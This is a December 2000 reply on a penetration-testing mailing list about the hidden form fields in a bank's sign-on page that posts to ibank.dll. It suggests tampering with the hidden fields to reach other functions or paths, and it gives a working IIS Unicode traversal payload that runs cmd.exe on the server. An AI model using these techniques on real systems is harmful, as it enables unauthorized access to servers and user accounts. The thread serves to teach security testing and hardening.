Penetration Testing mailing list archives
Re: [PEN-TEST] HTML source code and authentication
From: Yonatan Bokovza <Yonatan () XPERT COM>
Date: Mon, 18 Dec 2000 22:12:04 +0200
-----Original Message----- From: Skinner, Tim L. [mailto:tskinner () LARSONALLEN COM] Sent: Monday, December 18, 2000 9:13 PM To: PEN-TEST () SECURITYFOCUS COM Subject: [PEN-TEST] HTML source code and authentication Hi all, I must first appologize about my general ignorance of HTML, but I've been asked to look into this. I have a question regarding the source code of a web page that authenticates users. The snipit of source code from the web page in question is as follows: #<H2><font color=9771824>Member Sign On</font></H2>
So far, so good :)
#<form name="signon" action="/scripts/ibank.dll" method=post>
First off, try accessing site/scripts/ and site/scripts/ibank.dll See if any interesting error messages are generated.
#<INPUT TYPE ="HIDDEN" NAME=Func VALUE="SignOn">
Hidden fields, as a general note, are begging for a tweak. Play around with the site, see what other types of "Func" values are there. Maybe you can disconnect other users with LogOff, or find a function that will let you "update your details" without authentication.
#<INPUT TYPE=HIDDEN NAME=Frames VALUE="150">
That's not obvious. Try increasing it to 1500, or reducing it to 5 and see what happens.
#<INPUT TYPE ="HIDDEN" NAME=homepath VALUE="cu3">
Hmmm, this could be interesting. "cu3" might be some directory on the server, or the directory you came from, or any other number of related paths. How about changing it to "/" or "..", or just "cu2" and see if the error message gives out more information.
It leaves me wondering if the referenced ibank.dll file is some authentication program of some sort
Very probably so. This dll is used to analyze the results of your POST command. It probably access Username/Password of some sort and checks if your data matches anything.
and if the availability of this information simply by clicking on 'view source' is a potential problem.
Not as such. The dll will probably show up in the next URL, after you'll click SUBMIT, but the Hidden Fields are Bad Thing (tm).
Furthermore, is there a way to obscure this information if it is risk?
Sure. Don't use Hidden Fields, make sure you've got the right access controls to the /scripts directory and the ibank.dll file. Note we haven't mentioned IIS security. Try: server/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir Well, that concludes our "Hacking in 45 seconds" lesson for today, come back tomorrow for "SSH Hijacking for dummies". :) Best Regards, Yonatan Bokovza IT Security Consultant yonatan () xpert com Xpert Trusted Systems PGP Fingerprint: 1A96 EE70 11BB 5241 BE42 0831 6819 BAAF B9AD EDDF
Current thread:
- [PEN-TEST] HTML source code and authentication Skinner, Tim L. (Dec 18)
- Re: [PEN-TEST] HTML source code and authentication Bennett Todd (Dec 18)
- Re: [PEN-TEST] HTML source code and authentication c0ncept (Dec 18)
- Re: [PEN-TEST] HTML source code and authentication NetW3.COM Consulting (Dec 19)
- <Possible follow-ups>
- Re: [PEN-TEST] HTML source code and authentication Adams, Gavin (Dec 18)
- Re: [PEN-TEST] HTML source code and authentication Yonatan Bokovza (Dec 18)
- Re: [PEN-TEST] HTML source code and authentication Chris Tobkin (Dec 18)
- Re: [PEN-TEST] HTML source code and authentication Martijn Prummel (Dec 19)